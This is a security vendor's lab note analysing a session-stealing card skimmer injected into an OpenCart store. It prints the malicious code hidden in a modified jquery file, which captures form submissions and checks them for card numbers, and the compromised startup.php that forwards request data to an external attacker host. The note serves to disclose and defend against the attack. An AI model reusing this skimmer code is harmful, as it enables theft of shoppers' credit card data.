Session Stealer Script on OpenCart CMS

Labs Note

With so many open-source ecommerce platforms available in the market, creating an online shop is as easy as ABC. In less than five minutes you can set up your very own online storefront and offer physical and digital products for sale.

In this note I will present a malware infection on OpenCart, a powerful e-commerce shopping cart that provides great tools with minimal investment. Although its platform is simple to install and use, it doesn’t mean that you are protected against different kinds of malicious codes focused on intercepting and stealing sensitive data from your customers (credit card).

This time around, the malware we found worked as a session stealer in a way that attackers could get access to valid sessions of the checkout page and intercept sensitive credit card information. It is worth mentioning that this code is not specifically designed for OpenCart; there are different variations of this malicious script also being used in Magento websites as well.

Going deeper into the analysis itself, the first call to the malicious function had been done at ‘catalog/view/javascript/jquery/jquery-2.1.1.min.js’:

function send() {
    var btn=document.querySelectorAll("button, input, submit, .btn, .button");
    for (var i=0;i<btn.length;i++) {
        var b=btn[i];
        if(b.type!='txt' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
            if(b.addEventListener) {
                b.addEventListener("click", clk, false);
            } else {
                b.attachEvent('onclick', clk);
            }
        }
    }
    var frm=document.querySelectorAll("form");
    for (var i=0;i<frm.length;i++){
        if(frm[i].addEventListener) {
            frm[i].addEventListener("submit", clk, false);
        }else {
            frm[i].attachEvent('onsubmit', clk);
        }
    }
    if(snd!=null) {
        console.clear();
        var gc = new RegExp("[0-9]{13,16}");
        var cl="0";
        if(gc.test(snd)) {
            cl="1" ;
        
var http = new XMLHttpRequest();
        http.open("POST","/system/startup.php",true);
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("data="+snd+"&cl="+cl);
        console.clear();
    }

The file “jquery-2.1.1.min.js” had been completely modified and if you notice at the functions ‘send()’ and ‘clk()’, they were injected there to intercept button clicks and form submits (user interaction). This hijack allows the attackers to collect the names and content of every common form input element and send all the information via a $_POST request through the “startup.php” file.

Although “startup.php” is a default OpenCart file, this file had also been compromised and here is a snippet of it:

<?php
error_reporting(0);
$id=base64_encode('runrhody');
$url='hxxp://200.x.x.x/404/receiver.php';
if(!isset($_COOKIE["SESSIID"])){
    $rand=rand(1,9999999999);
    setcookie("SESSIID", $rand,time()+3600);
}else $cookie=$_COOKIE["SESSIID"];
    $url=$url.'?a='.$cookie;
    $data=base64_encode(serialize(array('request'=>$_REQUEST,'ip'=>$_SERVER['REMOTE_ADDR'],'ua'=>$_SERVER['HTTP_USER_AGENT'],'cookie'=>$cookie,'date_unix'=>time())));
    $opts = array('http' => array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'content' => http_build_query(array('utms'=>$id,'utmc'=>$_REQUEST['cl'],'data'=>$data))));
    $context  = stream_context_create($opts);
    file_get_contents($url, false, $context);
?>
<?php
// Error Reporting
error_reporting(E_ALL);

The code receives the stolen information from the jquery mentioned above and sends all the data to the attacker’s URL defined in the variable $url.

Is there a solution to avoid these thefts? Sure there is! Merchants need to understand that they are responsible for the processed data and should do everything they can to secure their environment. The answer to this is hidden behind PCI Compliance. 10, our Founder / CTO, released a nice intro to ecommerce and PCI Compliance post recently that you should definitely read if your website/business relies on an e-commerce platform.

If you run OpenCart or any other platform, we recommend checking out our Sucuri Firewall to protect your site from attacks and compromises.

You May Also Like